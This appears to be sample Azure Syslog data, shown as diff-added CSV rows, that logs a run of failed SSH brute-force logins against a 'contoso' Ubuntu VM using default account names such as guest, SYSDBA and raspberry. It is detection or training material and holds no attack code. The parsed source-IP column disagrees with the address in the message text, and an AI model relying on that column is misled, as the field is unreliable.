+2154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:15,UbuntuDevEnv,2019-06-28 05:09:14,auth,UbuntuDevEnv,info,Disconnecting invalid user guest 193.201.224.232 port 32948: Too many authentication failures [preauth],91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:15,UbuntuDevEnv,2019-06-28 05:09:14,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:17,UbuntuDevEnv,2019-06-28 05:09:16,auth,UbuntuDevEnv,info,Invalid user guest from 193.201.224.232 port 10153,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,10153,,
+2157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:17,UbuntuDevEnv,2019-06-28 05:09:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:17,UbuntuDevEnv,2019-06-28 05:09:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:19,UbuntuDevEnv,2019-06-28 05:09:19,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 10153 ssh2,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,10153,,
+2160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:19,UbuntuDevEnv,2019-06-28 05:09:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:21,UbuntuDevEnv,2019-06-28 05:09:20,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 10153 ssh2,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,10153,,
+2162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:21,UbuntuDevEnv,2019-06-28 05:09:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:23,UbuntuDevEnv,2019-06-28 05:09:22,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 10153 ssh2,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,10153,,
+2164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:25,UbuntuDevEnv,2019-06-28 05:09:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:27,UbuntuDevEnv,2019-06-28 05:09:27,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 10153 ssh2,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,10153,,
+2166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:29,UbuntuDevEnv,2019-06-28 05:09:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:29,UbuntuDevEnv,2019-06-28 05:09:29,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:29,UbuntuDevEnv,2019-06-28 05:09:29,auth,UbuntuDevEnv,info,"Disconnecting invalid user guest 193.201.224.232 port 10153: Change of username or service not allowed: (guest,ssh-connection) -> (default,ssh-connection) [preauth]",91743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,10153,,
+2169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:30,UbuntuDevEnv,2019-06-28 05:09:29,auth,UbuntuDevEnv,info,Invalid user default from 193.201.224.232 port 50125,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:30,UbuntuDevEnv,2019-06-28 05:09:30,auth,UbuntuDevEnv,info,Failed none for invalid user default from 193.201.224.232 port 50125 ssh2,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:30,UbuntuDevEnv,2019-06-28 05:09:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:30,UbuntuDevEnv,2019-06-28 05:09:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:33,UbuntuDevEnv,2019-06-28 05:09:32,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 50125 ssh2,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:33,UbuntuDevEnv,2019-06-28 05:09:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:34,UbuntuDevEnv,2019-06-28 05:09:34,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 50125 ssh2,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:34,UbuntuDevEnv,2019-06-28 05:09:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:36,UbuntuDevEnv,2019-06-28 05:09:36,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 50125 ssh2,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:39,UbuntuDevEnv,2019-06-28 05:09:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:41,UbuntuDevEnv,2019-06-28 05:09:41,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 50125 ssh2,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:43,UbuntuDevEnv,2019-06-28 05:09:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:45,UbuntuDevEnv,2019-06-28 05:09:44,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 50125 ssh2,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:45,UbuntuDevEnv,2019-06-28 05:09:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user default from 193.201.224.232 port 50125 ssh2 [preauth],91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:45,UbuntuDevEnv,2019-06-28 05:09:44,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:45,UbuntuDevEnv,2019-06-28 05:09:44,auth,UbuntuDevEnv,info,Disconnecting invalid user default 193.201.224.232 port 50125: Too many authentication failures [preauth],91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,50125,,
+2185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:45,UbuntuDevEnv,2019-06-28 05:09:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,91805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:46,UbuntuDevEnv,2019-06-28 05:09:45,auth,UbuntuDevEnv,info,Invalid user default from 193.201.224.232 port 27046,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:46,UbuntuDevEnv,2019-06-28 05:09:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:46,UbuntuDevEnv,2019-06-28 05:09:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:48,UbuntuDevEnv,2019-06-28 05:09:47,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 27046 ssh2,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:49,UbuntuDevEnv,2019-06-28 05:09:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:51,UbuntuDevEnv,2019-06-28 05:09:51,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 27046 ssh2,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:51,UbuntuDevEnv,2019-06-28 05:09:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:53,UbuntuDevEnv,2019-06-28 05:09:53,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 27046 ssh2,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:54,UbuntuDevEnv,2019-06-28 05:09:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:57,UbuntuDevEnv,2019-06-28 05:09:56,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 27046 ssh2,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:57,UbuntuDevEnv,2019-06-28 05:09:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:59,UbuntuDevEnv,2019-06-28 05:09:58,auth,UbuntuDevEnv,info,Failed password for invalid user default from 193.201.224.232 port 27046 ssh2,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:59,UbuntuDevEnv,2019-06-28 05:09:59,auth,UbuntuDevEnv,info,"Disconnecting invalid user default 193.201.224.232 port 27046: Change of username or service not allowed: (default,ssh-connection) -> (SYSDBA,ssh-connection) [preauth]",91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,193.201.224.2,27046,,
+2199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:59,UbuntuDevEnv,2019-06-28 05:09:59,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:59,UbuntuDevEnv,2019-06-28 05:09:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,91857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:02,UbuntuDevEnv,2019-06-28 05:10:01,auth,UbuntuDevEnv,info,Invalid user SYSDBA from 193.201.224.232 port 3969,91906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SYSDBA,193.201.224.2,3969,,
+2202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:02,UbuntuDevEnv,2019-06-28 05:10:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:02,UbuntuDevEnv,2019-06-28 05:10:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:04,UbuntuDevEnv,2019-06-28 05:10:03,auth,UbuntuDevEnv,info,Failed password for invalid user SYSDBA from 193.201.224.232 port 3969 ssh2,91906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SYSDBA,193.201.224.2,3969,,
+2205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:04,UbuntuDevEnv,2019-06-28 05:10:03,auth,UbuntuDevEnv,info,"Disconnecting invalid user SYSDBA 193.201.224.232 port 3969: Change of username or service not allowed: (SYSDBA,ssh-connection) -> (raspberry,ssh-connection) [preauth]",91906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SYSDBA,193.201.224.2,3969,,
+2206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:05,UbuntuDevEnv,2019-06-28 05:10:04,auth,UbuntuDevEnv,info,Invalid user raspberry from 193.201.224.232 port 7521,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,193.201.224.2,7521,,
+2207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:05,UbuntuDevEnv,2019-06-28 05:10:04,auth,UbuntuDevEnv,info,Failed none for invalid user raspberry from 193.201.224.232 port 7521 ssh2,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,193.201.224.2,7521,,
+2208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:05,UbuntuDevEnv,2019-06-28 05:10:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:05,UbuntuDevEnv,2019-06-28 05:10:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:07,UbuntuDevEnv,2019-06-28 05:10:07,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 193.201.224.232 port 7521 ssh2,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,193.201.224.2,7521,,
+2211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:07,UbuntuDevEnv,2019-06-28 05:10:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:09,UbuntuDevEnv,2019-06-28 05:10:08,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 193.201.224.232 port 7521 ssh2,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,193.201.224.2,7521,,
+2213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:09,UbuntuDevEnv,2019-06-28 05:10:08,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
